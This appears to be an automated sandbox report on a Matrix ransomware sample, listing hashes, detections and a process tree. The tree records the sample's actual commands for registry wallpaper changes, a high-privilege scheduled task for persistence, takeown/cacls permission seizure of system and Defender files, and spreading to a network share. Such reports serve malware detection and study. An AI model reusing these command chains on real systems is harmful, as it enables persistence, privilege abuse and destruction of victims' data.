Analysis

max time kernel: 149s
max time network: 152s
platform: windows10_x64
resource: win10
submitted: 08-10-2020 15:06

Static task: static1
Behavioral task: behavioral1
  Sample: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
  Resource: win10

General

Target: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
Size: 1.2MB
MD5: 0e527383dc50b48d63183e1176c4d79e
SHA1: c1437130dd774db14dd16c45771e7e1a484d5ee5
SHA256: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a
SHA512: 58a3edde62268c34b2577530b520559c8c8f4f085210703c59c75442b9162e396ea38973302afc3e54d6d546ccd7b246650b4e9aef137d7b7787ab3354aec457

Malware Config

Signatures

Matrix Ransomware (64 IoCs)
Targeted ransomware with information collection and encryption functionality.
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
Process: bcdedit.exe (pid 4420)
Process: bcdedit.exe (pid 1008)

Drops file in Drivers directory (1 IoCs)
File created: C:\Windows\system32\Drivers\PROCEXP152.SYS (process: UxaXqOSf64.exe)

Executes dropped EXE (64 IoCs)

Modifies extensions of user files (1 IoCs)
Ransomware generally changes the extension on encrypted files.
File opened for modification: C:\Users\Admin\Pictures\StartProtect.tiff (process: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe)

Sets service image path in registry (2 TTPs)

Modifies file permissions (1 TTPs, 64 IoCs)

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials and other sensitive data.

Drops desktop.ini file(s) (26 IoCs)

Enumerates connected drives (3 TTPs, 46 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.

Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Set value (str): \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\AeHtHf61.bmp" (process: reg.exe)

Drops file in Program Files directory (64 IoCs)
ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\LICENSE ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\snmp.acl.template ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\nashorn.jar ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ru_get.svg ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_18.svg ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\nashorn.jar ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\SearchMeasure.rle ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 
DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\appstore.png ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_removeme-default_18.svg ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\ui-strings.js ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
4684 schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process
4984 vssadmin.exe

Modifies Control Panel 5 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe
Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop reg.exe
Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\WallpaperStyle = "0" reg.exe
Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop reg.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process
4720 UxaXqOSf64.exe (the same entry is reported 9 times)

Suspicious behavior: LoadsDriver 1 IoCs
pid Process
4720 UxaXqOSf64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe"C:\Users\Admin\AppData\Local\Temp\ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe" "C:\Users\Admin\AppData\Local\Temp\NWmQwMXy.exe"2⤵PID:2140
-
-
C:\Users\Admin\AppData\Local\Temp\NWmQwMXy.exe"C:\Users\Admin\AppData\Local\Temp\NWmQwMXy.exe" -n2⤵
- Executes dropped EXE
PID:1412 -
C:\Users\Admin\AppData\Local\Temp\NWmQwMXy.exe"C:\Users\Admin\AppData\Local\Temp\NWmQwMXy.exe" "\\10.10.0.12\C$"3⤵PID:5620
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\AeHtHf61.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\AeHtHf61.bmp" /f3⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
PID:4324
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:4400
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:4428
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\AYjddmgv.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\AYjddmgv.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\lZgqBLCp.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\lZgqBLCp.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:4684
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:4832
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:4884
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""2⤵
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:4508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "classes.jsa" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf64.exeUxaXqOSf.exe -accepteula "classes.jsa" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4720
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db""2⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C3⤵PID:4640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"3⤵
- Modifies file permissions
PID:4668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "qmgr.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "qmgr.db" -nobanner4⤵
- Executes dropped EXE
PID:4776
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""2⤵PID:5084
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C3⤵PID:808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "SmsInterceptStore.db" -nobanner3⤵PID:2980
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "SmsInterceptStore.db" -nobanner4⤵
- Executes dropped EXE
PID:4164
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:4360
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:4140
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:4692
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "WinMail.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4704
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""2⤵PID:4688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C3⤵PID:4552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "manifest.json" -nobanner3⤵PID:1508
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "manifest.json" -nobanner4⤵
- Executes dropped EXE
PID:4364
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4824
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵PID:4816
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:4872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "wabmig.exe" -nobanner3⤵PID:4892
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "wabmig.exe" -nobanner4⤵
- Executes dropped EXE
PID:4836
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵PID:4992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:2520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "wab.exe" -nobanner3⤵PID:2504
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "wab.exe" -nobanner4⤵
- Executes dropped EXE
PID:1680
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""2⤵PID:980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:4380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "classes.jsa" -nobanner3⤵PID:4488
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:3004
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:4416
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:4780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:4432
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
PID:4772
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe""2⤵PID:4396
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe" /E /G Admin:F /C3⤵PID:4612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "SenseSampleUploader.exe" -nobanner3⤵PID:5004
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "SenseSampleUploader.exe" -nobanner4⤵
- Executes dropped EXE
PID:4984
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""2⤵PID:4868
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C3⤵PID:4184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "BrowserCore.exe" -nobanner3⤵PID:5044
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "BrowserCore.exe" -nobanner4⤵
- Executes dropped EXE
PID:3792
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Mail\WinMail.exe""2⤵PID:4156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:4948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\WinMail.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "WinMail.exe" -nobanner3⤵PID:4168
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "WinMail.exe" -nobanner4⤵
- Executes dropped EXE
PID:248
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe""2⤵PID:4128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" /E /G Admin:F /C3⤵PID:4436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "MsSense.exe" -nobanner3⤵PID:4404
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "MsSense.exe" -nobanner4⤵
- Executes dropped EXE
PID:4340
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:4500
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:4988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:4584
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4820
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4840
-
-
-
depth 2 | PID 5040 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  depth 3 | PID 4224 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
  depth 3 | PID 3036 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" | signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  depth 3 | PID 4072 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    depth 4 | PID 4112 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "ImagingDevices.exe.mui" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 748 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 4632 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  depth 3 | PID 4544 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
  depth 3 | PID 3808 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" | signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  depth 3 | PID 4680 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "Workflow.Targets" -nobanner
    depth 4 | PID 4160 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "Workflow.Targets" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 5112 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 4592 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""
  depth 3 | PID 4588 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
  depth 3 | PID 4196 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" | signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
